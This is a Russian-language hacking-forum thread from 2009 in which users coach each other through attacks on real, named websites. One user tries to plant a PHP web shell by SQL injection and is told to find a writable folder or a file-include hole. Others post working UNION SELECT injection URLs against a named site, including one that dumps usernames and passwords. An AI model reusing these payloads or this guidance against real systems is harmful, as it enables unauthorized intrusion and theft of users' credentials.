07.03.2009, 16:57
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Как понять "не знаю папку на запись" ?
Лей в ту папку, куда из админки заливается твоя картинка, права должны быть
|
|
|
07.03.2009, 17:00
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами:
9456679
Репутация:
97
|
|
Я в неё и пробовал, нифига =(
|
|
|
|
07.03.2009, 17:04
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Imperou$
Я в неё и пробовал, нифига =(
Так что ты хочешь услышать? Если скрипт меняет расширение файла при заливке, то ничего ты тут не сделаешь. Ищи папку на запись, и лей через скуль. Или ищи инклуд, и инклудь свой шелл
|
|
|
|
07.03.2009, 17:59
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами:
9456679
Репутация:
97
|
|
Куда не пробую, не выходит...
"Can't create/write to file '/home/httpd/vhosts/site.org/httpdocs/images/c.php' (Errcode: 13)"
Искал папку tmp, чаще всего просто встречал-не нашёл.
Инклуда нет, я не нашёл.Двиг баганый, я уже заливал на многие такие же через админку, нормально аплоадило, расширение не менялось.Вот первый раз столкнулся.
Если у кого есть желание посмотреть, могу в пм скинуть данные для доступа в админку и саму скулю.
|
|
|
|
07.03.2009, 19:01
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Не хватает прав, ищи диру доступную для записи..
Можешь скинуть в личку, посмотрю, ради интереса.
|
|
|
|
07.03.2009, 19:37
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
Народ подскажите какой префикс у таблиц форума http://www.stavochka.com/forum/index.php а то я ужо за''''ся =)
|
|
|
|
07.03.2009, 19:40
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
http://up.cih.ms/ettee/sql/
По дефолту
phpbb_
|
|
|
|
07.03.2009, 19:53
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
jokester, там не дефолт... Не канает phpbb_ Вот смотри сам..
http://www.new.stavochka.com/view.php?contentid=999999999999%20union%20select%2 01,2,3,4,username,6,7,8,9,10%20%20from%20phpbb_use rs--
Есть подозрение что там ваще без префикса
http://www.new.stavochka.com/view.php?contentid=999999999999%20union%20select%2 01,2,3,4,username,6,7,8,9,10%20%20from%20users--
Но тогда почему нету user_password ?? блин.
|
|
|
|
07.03.2009, 20:07
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
http://www.new.stavochka.com/view.php?contentid=999999999999+union+select+1,2,3 ,4,concat_ws(0x2F,username,userpassword),6,7,8,9,1 0+from+users--
Смотри сурс странички авторизации
<input name=userpassword size=18 type=password>
Бывает, что совпадает с именем колумна (но не всегда конечно). А таблицы форума могут лежать в другой базе, к которой вообще может не быть доступа
|
|
|
|
07.03.2009, 20:13
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
ElteRUS, спс. + воткнуть не могу седня уже исчерпал лимит!!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|
Похожие темы
Комбинированный вид
